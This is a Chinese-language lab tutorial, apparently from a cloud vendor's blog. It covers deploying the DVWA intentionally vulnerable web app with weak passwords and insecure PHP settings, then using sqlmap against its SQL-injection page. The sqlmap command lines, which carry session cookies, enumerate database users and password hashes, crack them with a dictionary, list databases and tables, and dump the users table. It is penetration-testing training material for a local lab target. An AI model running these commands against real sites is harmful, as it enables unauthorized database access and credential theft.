測(cè)試演練系統(tǒng)DVWA流程

下文內(nèi)容主要給大家?guī)?lái)測(cè)試演練系統(tǒng)DVWA流程，這里所講到的知識(shí)，與書(shū)籍略有不同，都是億速云專(zhuān)業(yè)技術(shù)人員在與用戶(hù)接觸過(guò)程中，總結(jié)出來(lái)的，具有一定的經(jīng)驗(yàn)分享價(jià)值，希望給廣大讀者帶來(lái)幫助。

一、部署***測(cè)試演練系統(tǒng)DVWA

1. 下載DVWA軟件包

    官方下載地址：http://www.dvwa.co.uk/，當(dāng)前最新版本為：DVWA-1.9

    wget https://codeload.github.com/ethicalhack3r/DVWA/zip/master

2. 部署linux環(huán)境

    yum install -y httpd mysql mysql-server php php-mysql php-gd

3. 開(kāi)啟httpd和mysqld服務(wù)

    service httpd start

    service mysqld start

4. 測(cè)試htttp對(duì)php的解析,瀏覽器訪問(wèn)http://ip/test.php正常

    vim /var/www/html/test.php

    寫(xiě)入：

   <?php

     phpinfo();

   ?>

5. 修改mysql的密碼

     mysqladmin -uroot password "123456"

6. 將DVWA-1.9.zip解壓至/var/www/html，并修改屬主為apache

     unzip DVWA-1.9.zip -d /var/www/html

    chown -R apache:apache /var/www/html/DVWA-1.9

7. 修改DVWA配置文件數(shù)據(jù)庫(kù)密碼為123456

    vim /var/www/html/DVWA-1.9/config/config.inc.php

    修改密碼：

    $_DVWA[ 'db_password' ] = '123456';

8. 進(jìn)入DVWA的web安裝界面，http://ip/DVWA-1.9/setup.php，發(fā)現(xiàn)報(bào)錯(cuò)    

   解決方法：

   1）編輯php的配置文件 vim /etc/php.ini

        allow_url_include = On

   2）編輯DVWA配置文件 vim /var/www/html/DVWA-1.9/config/config.inc.php

        找到創(chuàng)建公鑰和私鑰的鏈接：https://www.google.com/recaptcha/admin/create申請(qǐng)后填寫(xiě)在配置文件中：

       公鑰：6LcY-BUUAAAAAGJ5Q0Y5zPEccMG5vCeHI1Lnwqyb

                  私鑰：6LcY-BUUAAAAAPvvHmppQRscfHuV0QPPuM5-Px3k

9. 重啟http，使修改的配置文件生效，刷新web界面，錯(cuò)誤消除

    service httpd restart

10. 點(diǎn)擊Create/Reset Database，自動(dòng)跳轉(zhuǎn)到登錄界面，默認(rèn)用戶(hù)名/密碼：admin/password

      至此，DVWA已部署完成

二、安裝SQLmap漏洞查看工具

1. 官方下載：http://sqlmap.org/http://sqlmap.org/

     版本：sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

2.  解壓sqlmap，并執(zhí)行

      說(shuō)明：該工具是用python寫(xiě)的，需安裝python，它不是編譯型語(yǔ)言，而是執(zhí)行性語(yǔ)言，直接運(yùn)行

      命令 tar -zxvf  sqlmapproject-sqlmap-1.0.9-87-g7eab1bc.tar.gz

      命令 ./sqlmap.py

3. 設(shè)置命令別名，修改vim /etc/profile，直接使用sqlmap命令

     命令 alias sqlmap='python /usr/local/src/sqlmapproject-sqlmap-7eab1bc/sqlmap.py'

     命令 source /etc/profile  

三、實(shí)戰(zhàn)

        實(shí)戰(zhàn)1：枚舉登錄MYSQL數(shù)據(jù)的用戶(hù)名與密碼

        實(shí)戰(zhàn)2：枚舉所有數(shù)據(jù)庫(kù)

        實(shí)戰(zhàn)3：枚舉指定數(shù)據(jù)庫(kù)的數(shù)據(jù)表

        實(shí)戰(zhàn)4：獲取指定數(shù)據(jù)庫(kù)和表中所有列的信息

        實(shí)戰(zhàn)5：枚舉指定數(shù)據(jù)表中的所有用戶(hù)名與密碼

       環(huán)境準(zhǔn)備：

       1）登錄http://192.168.1.124/DVWA-1.9，將安全級(jí)別設(shè)置為最低；

       2）開(kāi)啟Firefox瀏覽器TamperData插件，等待獲取cookies值；

       3）在【SQL Injection】項(xiàng)中，提交User ID為22（地址欄出現(xiàn)id=22，這就是MySQL的注入點(diǎn)）

             獲得注入點(diǎn)：http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=22&Submit=Submit#

       4）TamperData彈窗獲取cookies值：security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552

實(shí)戰(zhàn)1：枚舉登錄MYSQL數(shù)據(jù)的用戶(hù)名與密碼

   sqlmap語(yǔ)法參數(shù)：

• -u ：指定目標(biāo)URL，即注入點(diǎn)

• --cookies：當(dāng)前會(huì)話(huà)的cookies值

• -b：獲取數(shù)據(jù)庫(kù)類(lèi)型，檢索數(shù)據(jù)庫(kù)管理系統(tǒng)標(biāo)識(shí)

• --current-db：獲取當(dāng)前數(shù)據(jù)庫(kù)

• --current-user：獲取當(dāng)前登錄數(shù)據(jù)庫(kù)使用的用戶(hù)

命令：

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' -b  --current-db  --current-user

說(shuō)明：根據(jù)提示回復(fù)Y，繼續(xù)

結(jié)果：得到當(dāng)前數(shù)據(jù)庫(kù)為dawa，使用的用戶(hù)為root@localhost

實(shí)戰(zhàn)2：枚舉所有數(shù)據(jù)庫(kù)

   sqlmap語(yǔ)法參數(shù)：

• --users：枚舉數(shù)據(jù)庫(kù)用戶(hù)名

• -password：枚舉數(shù)據(jù)庫(kù)用戶(hù)的密碼（hash）

命令：

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --users --password

說(shuō)明：選擇目錄下字典文件，暴力破解

結(jié)果：數(shù)據(jù)庫(kù)用戶(hù)名為root，密碼也有明文形式123456

實(shí)戰(zhàn)3：枚舉數(shù)據(jù)庫(kù)和指定數(shù)據(jù)庫(kù)的數(shù)據(jù)表

   sqlmap語(yǔ)法參數(shù)：

• --dbs：枚舉當(dāng)前數(shù)據(jù)庫(kù)

命令：

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" --dbs

結(jié)果：mysql下所有的數(shù)據(jù)庫(kù)

命令：

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa --tables

結(jié)果：dvwa庫(kù)中，所有的表

實(shí)戰(zhàn)4：獲取指定數(shù)據(jù)庫(kù)和表中所有列的信息

   sqlmap語(yǔ)法參數(shù)：

• -D：指定的數(shù)據(jù)庫(kù)

• -T：指定數(shù)據(jù)庫(kù)中的數(shù)據(jù)表

• --columns：獲取列的信息

命令：

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users --columns

結(jié)果：dvwa庫(kù)，users表中所有字段信息

實(shí)戰(zhàn)5：枚舉指定數(shù)據(jù)表中的所有用戶(hù)名與密碼

   sqlmap語(yǔ)法參數(shù)：

• -C：枚舉數(shù)據(jù)表中的列

• --dump：存儲(chǔ)數(shù)據(jù)表項(xiàng)

命令：

sqlmap -u "http://192.168.1.124/DVWA-1.9/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie='security=low; PHPSESSID=i5jau9v20hh6g76l450ujf5552' --string="Surname" -D dvwa -T users -C user,password --dump

結(jié)果：dvwa庫(kù)，users表中user字段和password字段信息，最后表中信息轉(zhuǎn)存文件中

對(duì)于以上關(guān)于測(cè)試演練系統(tǒng)DVWA流程，如果大家還有更多需要了解的可以持續(xù)關(guān)注我們億速云的行業(yè)推新，如需獲取專(zhuān)業(yè)解答，可在官網(wǎng)聯(lián)系售前售后的，希望該文章可給大家?guī)?lái)一定的知識(shí)更新。